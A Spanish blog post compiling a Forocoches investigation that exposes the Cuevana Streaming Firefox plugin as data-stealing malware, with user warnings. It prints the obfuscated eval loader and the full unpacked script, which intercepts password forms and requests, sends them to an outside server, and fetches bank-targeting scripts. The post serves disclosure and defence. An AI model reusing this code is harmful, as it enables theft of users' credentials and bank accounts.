Toda la entrada es una recopilación de un post de Forocoches, abierto por el usuariosrednalF, le agradecemos a él y a todos los demás usuarios de Forocoches que han ayudado ( y lo siguen haciendo ) para descubrir qué hay detrás de todo este lío. Esta entrada se irá actualizando con la información, datos y demás que se vayan averiguando poco a poco.
NOTICIA REDACTADA por el usuario RME de Forocoches:
(Link al post original: http://www.forocoches.com/foro/showthread.php?p=119904298 )
Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.
Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))
En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.
Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana
———————————-
“Todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:
http://i50.tinypic.com/6z7byr.png
http://i47.tinypic.com/15n0wpj.png”
———————————-
actualización : post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe.
———————————-
Aquí un vídeo de cómo “actúa” el plug-in:
actualización : confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.
———————————–
ACTUALIZACIÓN IMPORTANTE:
Confirmado que el plugin oficial tiene phising
Pruebas:
Descomprimir xpi con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO INSTALEIS)
Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”.
La url maliciosa es hxxp://cuevanatv.asia/back3.js
———————————-
IMPORTANTE: En el post #294 hay una RECOPILACIÓN de todo el MALWARE del plug-in.
———————————-
MUY IMPORTANTE:
Para todo aquel que sepa de programación/código y demás, aquí el código malicioso, gracias al usuario muertet de Forocoches:
ESTÁ ESCONDIDO EN EL script-compiler.js del plugin de firefox. En forma de eval. Si se hace el unpack podemos encontrar las peticiones citadas.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))
Unpacked:
var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);
El script malicioso:
var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);
El scripts.txt:
var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }
A parte de keylogger, está especializado en robar cuentas de esos bancos.
———————————-
AVISO! Actualización a las 19:25
Cuevanatv.asia parece ser que ha caido, o ha sido el host o ellos mismos.
http://www.downforeveryoneorjustme.com/cuevanatv.asia
———————————-
AVISO! Actualización a las 19:50
El nuevo plugin (diferente pero con la misma version para que no se sospeche ) YA NO ROBA DATOS. En el tamper Data ya no da el aviso que daba antes. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.
———————————-
19:57
Confirmado, solo cambia la linea 232 del fichero script-compiler.js
Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de forocoches se puede encontrar el ficheo original con el código malicioso, como prueba.
———————————-
IMPORTANTE: Aclarar que GalactiCow no culpa directamente a CUEVANA, ya que pueden haber infectado el plug-in terceros, simplemente difundimos la información. Desde GalactiCow aconsejamos borrar el plug-in y cambiar todas las contraseñas y/o nombres de usuarios posibles.
Aquí el link al post de FOROCOCHES con toda la información, datos, comentarios, etc:
http://www.forocoches.com/foro/showthread.php?t=2923803
Fuente: